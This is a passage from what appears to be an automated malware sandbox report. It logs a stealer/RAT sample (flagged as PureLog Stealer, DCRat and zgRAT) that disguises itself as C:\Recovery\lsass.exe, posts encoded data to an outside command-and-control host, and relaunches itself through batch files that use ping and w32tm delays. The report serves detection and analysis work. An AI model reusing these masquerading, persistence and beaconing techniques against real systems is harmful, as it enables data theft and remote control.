                                      Data Ascii: VWWUXQVW\L~~sfw\P_a[kPRSBvc_kp`lRdZx~Ik`c^`Ni_~V@{CPbW
                                      Dec 6, 2024 01:43:32.761173964 CET25INHTTP/1.1 100 Continue
                                      Dec 6, 2024 01:43:32.993482113 CET376INHTTP/1.1 404 Not Found
                                      Server: nginx
                                      Date: Fri, 06 Dec 2024 00:43:32 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Content-Length: 213
                                      Connection: keep-alive
                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                      Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      8192.168.2.44984437.44.238.250805652C:\Recovery\lsass.exe
                                      TimestampBytes transferredDirectionData
                                      Dec 6, 2024 01:43:40.040225029 CET333OUTPOST /BigloadgeneratortraffictestDatalifeTemp.php HTTP/1.1
                                      Content-Type: application/x-www-form-urlencoded
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                      Host: 595506cm.n9shka.top
                                      Content-Length: 344
                                      Expect: 100-continue
                                      Connection: Keep-Alive
                                      Dec 6, 2024 01:43:40.398958921 CET344OUTData Raw: 05 02 01 07 06 0c 04 00 05 06 02 01 02 0c 01 06 00 07 05 0e 02 0c 03 09 01 01 0d 56 05 03 03 52 0d 51 07 59 03 04 04 0a 0e 51 06 05 07 50 07 0e 04 07 0e 5e 0e 05 07 03 05 57 07 54 07 07 07 58 03 0a 0e 0c 00 00 01 04 0e 54 0f 03 0d 04 0d 02 04 04
                                      Data Ascii: VRQYQP^WTXTT[\L}Pkpu^wbqa[hRivohcp{lsl`v|}{Qvwxe~V@{mfru
                                      Dec 6, 2024 01:43:41.333076000 CET25INHTTP/1.1 100 Continue
                                      Dec 6, 2024 01:43:41.565629005 CET376INHTTP/1.1 404 Not Found
                                      Server: nginx
                                      Date: Fri, 06 Dec 2024 00:43:40 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Content-Length: 213
                                      Connection: keep-alive
                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                      Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      9192.168.2.44987237.44.238.250803068C:\Recovery\lsass.exe
                                      TimestampBytes transferredDirectionData
                                      Dec 6, 2024 01:43:52.802166939 CET332OUTPOST /BigloadgeneratortraffictestDatalifeTemp.php HTTP/1.1
                                      Content-Type: application/x-www-form-urlencoded
                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                      Host: 595506cm.n9shka.top
                                      Content-Length: 344
                                      Expect: 100-continue
                                      Connection: Keep-Alive
                                      Dec 6, 2024 01:43:53.149029016 CET344OUTData Raw: 05 01 04 04 06 0a 04 00 05 06 02 01 02 06 01 05 00 07 05 09 02 07 03 0e 03 07 0e 01 03 06 01 57 0f 00 03 0e 02 56 06 02 0d 05 07 0b 07 0a 07 04 04 50 0b 0b 0c 04 04 05 05 07 03 00 06 52 05 0a 02 00 0f 0a 04 05 01 04 0e 07 0c 00 0c 06 0e 03 07 06
                                      Data Ascii: WVPRXQP\L~AhYjOvquuelA~l}`Ut~pkYy|tXlNW^hT|NwIk^~e~V@B{SfN}Li
                                      Dec 6, 2024 01:43:54.078912020 CET25INHTTP/1.1 100 Continue
                                      Dec 6, 2024 01:43:54.314062119 CET376INHTTP/1.1 404 Not Found
                                      Server: nginx
                                      Date: Fri, 06 Dec 2024 00:43:53 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Content-Length: 213
                                      Connection: keep-alive
                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                      Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                      Click to jump to process

                                      Click to jump to process

                                      Click to dive into process behavior distribution

                                      Click to jump to process

                                      Target ID:0
                                      Start time:19:41:54
                                      Start date:05/12/2024
                                      Path:C:\Users\user\Desktop\Qsi7IgkrWa.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Users\user\Desktop\Qsi7IgkrWa.exe"
                                      Imagebase:0xbb0000
                                      File size:2'470'804 bytes
                                      MD5 hash:6296CF36BBBBE91B8FF186D18A08AFA3
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000003.1653046738.000000000623E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000003.1653971657.0000000006A3D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                      Reputation:low
                                      Has exited:true

                                      Target ID:1
                                      Start time:19:41:54
                                      Start date:05/12/2024
                                      Path:C:\Windows\SysWOW64\wscript.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Windows\System32\WScript.exe" "C:\HypercontainerServerhostDll\RHmzYjMP0dDm1pBgOIzRbUC3iX8v0CjLnvVuc2eDTHRjOJ2gOiG4vHIxjIg.vbe"
                                      Imagebase:0x80000
                                      File size:147'456 bytes
                                      MD5 hash:FF00E0480075B095948000BDC66E81F0
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Target ID:2
                                      Start time:19:42:01
                                      Start date:05/12/2024
                                      Path:C:\Windows\SysWOW64\cmd.exe
                                      Wow64 process (32bit):true
                                      Commandline:C:\Windows\system32\cmd.exe /c ""C:\HypercontainerServerhostDll\Co5kty8OPng0Nyp4HYDkYO7HsD34XQHH4YSTo2iz4L3YIjbR4.bat" "
                                      Imagebase:0x240000
                                      File size:236'544 bytes
                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Target ID:3
                                      Start time:19:42:01
                                      Start date:05/12/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff7699e0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Target ID:4
                                      Start time:19:42:01
                                      Start date:05/12/2024
                                      Path:C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exe
                                      Wow64 process (32bit):false
                                      Commandline:"C:\HypercontainerServerhostDll/ComponentBrowserruntimeHostNet.exe"
                                      Imagebase:0x8a0000
                                      File size:1'916'928 bytes
                                      MD5 hash:BD5DF5DC5869453A2501A80C6FC937F4
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000004.00000000.1725030909.00000000008A2000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000004.00000002.1763332886.000000001303B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exe, Author: Joe Security
                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exe, Author: Joe Security
                                      Antivirus matches:
                                      • Detection: 100%, Avira
                                      • Detection: 100%, Joe Sandbox ML
                                      • Detection: 83%, ReversingLabs
                                      Reputation:low
                                      Has exited:true

                                      Target ID:5
                                      Start time:19:42:05
                                      Start date:05/12/2024
                                      Path:C:\Windows\System32\cmd.exe
                                      Wow64 process (32bit):false
                                      Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\jUHUXwf87c.bat"
                                      Imagebase:0x7ff699930000
                                      File size:289'792 bytes
                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Target ID:6
                                      Start time:19:42:05
                                      Start date:05/12/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff7699e0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Target ID:7
                                      Start time:19:42:05
                                      Start date:05/12/2024
                                      Path:C:\Windows\System32\chcp.com
                                      Wow64 process (32bit):false
                                      Commandline:chcp 65001
                                      Imagebase:0x7ff7d7430000
                                      File size:14'848 bytes
                                      MD5 hash:33395C4732A49065EA72590B14B64F32
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Target ID:8
                                      Start time:19:42:05
                                      Start date:05/12/2024
                                      Path:C:\Windows\System32\PING.EXE
                                      Wow64 process (32bit):false
                                      Commandline:ping -n 10 localhost
                                      Imagebase:0x7ff70f330000
                                      File size:22'528 bytes
                                      MD5 hash:2F46799D79D22AC72C241EC0322B011D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Target ID:10
                                      Start time:19:42:14
                                      Start date:05/12/2024
                                      Path:C:\Recovery\lsass.exe
                                      Wow64 process (32bit):false
                                      Commandline:"C:\Recovery\lsass.exe"
                                      Imagebase:0x230000
                                      File size:1'916'928 bytes
                                      MD5 hash:BD5DF5DC5869453A2501A80C6FC937F4
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Recovery\lsass.exe, Author: Joe Security
                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Recovery\lsass.exe, Author: Joe Security
                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Recovery\lsass.exe, Author: Joe Security
                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Recovery\lsass.exe, Author: Joe Security
                                      Antivirus matches:
                                      • Detection: 100%, Avira
                                      • Detection: 100%, Joe Sandbox ML
                                      • Detection: 83%, ReversingLabs
                                      Reputation:low
                                      Has exited:true

                                      Target ID:11
                                      Start time:19:42:18
                                      Start date:05/12/2024
                                      Path:C:\Windows\System32\cmd.exe
                                      Wow64 process (32bit):false
                                      Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\nhkbaghNki.bat"
                                      Imagebase:0x7ff699930000
                                      File size:289'792 bytes
                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Target ID:12
                                      Start time:19:42:18
                                      Start date:05/12/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff7699e0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Target ID:13
                                      Start time:19:42:18
                                      Start date:05/12/2024
                                      Path:C:\Windows\System32\chcp.com
                                      Wow64 process (32bit):false
                                      Commandline:chcp 65001
                                      Imagebase:0x7ff72bec0000
                                      File size:14'848 bytes
                                      MD5 hash:33395C4732A49065EA72590B14B64F32
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:14
                                      Start time:19:42:18
                                      Start date:05/12/2024
                                      Path:C:\Windows\System32\PING.EXE
                                      Wow64 process (32bit):false
                                      Commandline:ping -n 10 localhost
                                      Imagebase:0x7ff636520000
                                      File size:22'528 bytes
                                      MD5 hash:2F46799D79D22AC72C241EC0322B011D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:17
                                      Start time:19:42:27
                                      Start date:05/12/2024
                                      Path:C:\Recovery\lsass.exe
                                      Wow64 process (32bit):false
                                      Commandline:"C:\Recovery\lsass.exe"
                                      Imagebase:0xcb0000
                                      File size:1'916'928 bytes
                                      MD5 hash:BD5DF5DC5869453A2501A80C6FC937F4
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:18
                                      Start time:19:42:31
                                      Start date:05/12/2024
                                      Path:C:\Windows\System32\cmd.exe
                                      Wow64 process (32bit):false
                                      Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\TqMgut2j0M.bat"
                                      Imagebase:0x7ff699930000
                                      File size:289'792 bytes
                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:19
                                      Start time:19:42:31
                                      Start date:05/12/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff7699e0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:20
                                      Start time:19:42:31
                                      Start date:05/12/2024
                                      Path:C:\Windows\System32\chcp.com
                                      Wow64 process (32bit):false
                                      Commandline:chcp 65001
                                      Imagebase:0x7ff7d7430000
                                      File size:14'848 bytes
                                      MD5 hash:33395C4732A49065EA72590B14B64F32
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:21
                                      Start time:19:42:31
                                      Start date:05/12/2024
                                      Path:C:\Windows\System32\w32tm.exe
                                      Wow64 process (32bit):false
                                      Commandline:w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                      Imagebase:0x7ff65a030000
                                      File size:108'032 bytes
                                      MD5 hash:81A82132737224D324A3E8DA993E2FB5
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:22
                                      Start time:19:42:36
                                      Start date:05/12/2024
                                      Path:C:\Recovery\lsass.exe
                                      Wow64 process (32bit):false
                                      Commandline:"C:\Recovery\lsass.exe"
                                      Imagebase:0x350000
                                      File size:1'916'928 bytes
                                      MD5 hash:BD5DF5DC5869453A2501A80C6FC937F4
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:23
                                      Start time:19:42:40
                                      Start date:05/12/2024
                                      Path:C:\Windows\System32\cmd.exe
                                      Wow64 process (32bit):false
                                      Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\2JnastWSjL.bat"
                                      Imagebase:0x7ff699930000
                                      File size:289'792 bytes
                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:24
                                      Start time:19:42:40
                                      Start date:05/12/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff7699e0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:25
                                      Start time:19:42:40
                                      Start date:05/12/2024
                                      Path:C:\Windows\System32\chcp.com
                                      Wow64 process (32bit):false
                                      Commandline:chcp 65001
                                      Imagebase:0x7ff7d7430000
                                      File size:14'848 bytes
                                      MD5 hash:33395C4732A49065EA72590B14B64F32
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:26
                                      Start time:19:42:40
                                      Start date:05/12/2024
                                      Path:C:\Windows\System32\PING.EXE
                                      Wow64 process (32bit):false
                                      Commandline:ping -n 10 localhost
                                      Imagebase:0x7ff636520000
                                      File size:22'528 bytes
                                      MD5 hash:2F46799D79D22AC72C241EC0322B011D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:27
                                      Start time:19:42:49
                                      Start date:05/12/2024
                                      Path:C:\Recovery\lsass.exe
                                      Wow64 process (32bit):false
                                      Commandline:"C:\Recovery\lsass.exe"
                                      Imagebase:0x350000
                                      File size:1'916'928 bytes
                                      MD5 hash:BD5DF5DC5869453A2501A80C6FC937F4
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:28
                                      Start time:19:42:53
                                      Start date:05/12/2024
                                      Path:C:\Windows\System32\cmd.exe
                                      Wow64 process (32bit):false
                                      Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\5tk1CddJ7G.bat"
                                      Imagebase:0x7ff699930000
                                      File size:289'792 bytes
                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:29
                                      Start time:19:42:53
                                      Start date:05/12/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff7699e0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:30
                                      Start time:19:42:54
                                      Start date:05/12/2024
                                      Path:C:\Windows\System32\chcp.com
                                      Wow64 process (32bit):false
                                      Commandline:chcp 65001
                                      Imagebase:0x7ff7d7430000
                                      File size:14'848 bytes
                                      MD5 hash:33395C4732A49065EA72590B14B64F32
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:31
                                      Start time:19:42:54
                                      Start date:05/12/2024
                                      Path:C:\Windows\System32\PING.EXE
                                      Wow64 process (32bit):false
                                      Commandline:ping -n 10 localhost
                                      Imagebase:0x7ff636520000
                                      File size:22'528 bytes
                                      MD5 hash:2F46799D79D22AC72C241EC0322B011D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:32
                                      Start time:19:43:03
                                      Start date:05/12/2024
                                      Path:C:\Recovery\lsass.exe
                                      Wow64 process (32bit):false
                                      Commandline:"C:\Recovery\lsass.exe"
                                      Imagebase:0x4b0000
                                      File size:1'916'928 bytes
                                      MD5 hash:BD5DF5DC5869453A2501A80C6FC937F4
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:33
                                      Start time:19:43:06
                                      Start date:05/12/2024
                                      Path:C:\Windows\System32\cmd.exe
                                      Wow64 process (32bit):false
                                      Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\riciCmDgnt.bat"
                                      Imagebase:0x7ff699930000
                                      File size:289'792 bytes
                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:34
                                      Start time:19:43:06
                                      Start date:05/12/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff7699e0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:35
                                      Start time:19:43:06
                                      Start date:05/12/2024
                                      Path:C:\Windows\System32\chcp.com
                                      Wow64 process (32bit):false
                                      Commandline:chcp 65001
                                      Imagebase:0x7ff7d7430000
                                      File size:14'848 bytes
                                      MD5 hash:33395C4732A49065EA72590B14B64F32
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:36
                                      Start time:19:43:06
                                      Start date:05/12/2024
                                      Path:C:\Windows\System32\w32tm.exe
                                      Wow64 process (32bit):false
                                      Commandline:w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                      Imagebase:0x7ff65a030000
                                      File size:108'032 bytes
                                      MD5 hash:81A82132737224D324A3E8DA993E2FB5
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:37
                                      Start time:19:43:12
                                      Start date:05/12/2024
                                      Path:C:\Recovery\lsass.exe
                                      Wow64 process (32bit):false
                                      Commandline:"C:\Recovery\lsass.exe"
                                      Imagebase:0x100000
                                      File size:1'916'928 bytes
                                      MD5 hash:BD5DF5DC5869453A2501A80C6FC937F4
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:38
                                      Start time:19:43:15
                                      Start date:05/12/2024
                                      Path:C:\Windows\System32\cmd.exe
                                      Wow64 process (32bit):false
                                      Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\qoP5fBU7F9.bat"
                                      Imagebase:0x7ff699930000
                                      File size:289'792 bytes
                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:39
                                      Start time:19:43:15
                                      Start date:05/12/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff7699e0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:40
                                      Start time:19:43:15
                                      Start date:05/12/2024
                                      Path:C:\Windows\System32\chcp.com
                                      Wow64 process (32bit):false
                                      Commandline:chcp 65001
                                      Imagebase:0x7ff7d7430000
                                      File size:14'848 bytes
                                      MD5 hash:33395C4732A49065EA72590B14B64F32
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:41
                                      Start time:19:43:15
                                      Start date:05/12/2024
                                      Path:C:\Windows\System32\w32tm.exe
                                      Wow64 process (32bit):false
                                      Commandline:w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                      Imagebase:0x7ff65a030000
                                      File size:108'032 bytes
                                      MD5 hash:81A82132737224D324A3E8DA993E2FB5
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:43
                                      Start time:19:43:20
                                      Start date:05/12/2024
                                      Path:C:\Recovery\lsass.exe
                                      Wow64 process (32bit):false
                                      Commandline:"C:\Recovery\lsass.exe"
                                      Imagebase:0x960000
                                      File size:1'916'928 bytes
                                      MD5 hash:BD5DF5DC5869453A2501A80C6FC937F4
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:44
                                      Start time:19:43:23
                                      Start date:05/12/2024
                                      Path:C:\Windows\System32\cmd.exe
                                      Wow64 process (32bit):false
                                      Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\hR2MTpBDVc.bat"
                                      Imagebase:0x7ff699930000
                                      File size:289'792 bytes
                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:45
                                      Start time:19:43:23
                                      Start date:05/12/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff7699e0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:46
                                      Start time:19:43:24
                                      Start date:05/12/2024
                                      Path:C:\Windows\System32\chcp.com
                                      Wow64 process (32bit):false
                                      Commandline:chcp 65001
                                      Imagebase:0x7ff7d7430000
                                      File size:14'848 bytes
                                      MD5 hash:33395C4732A49065EA72590B14B64F32
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:47
                                      Start time:19:43:24
                                      Start date:05/12/2024
                                      Path:C:\Windows\System32\w32tm.exe
                                      Wow64 process (32bit):false
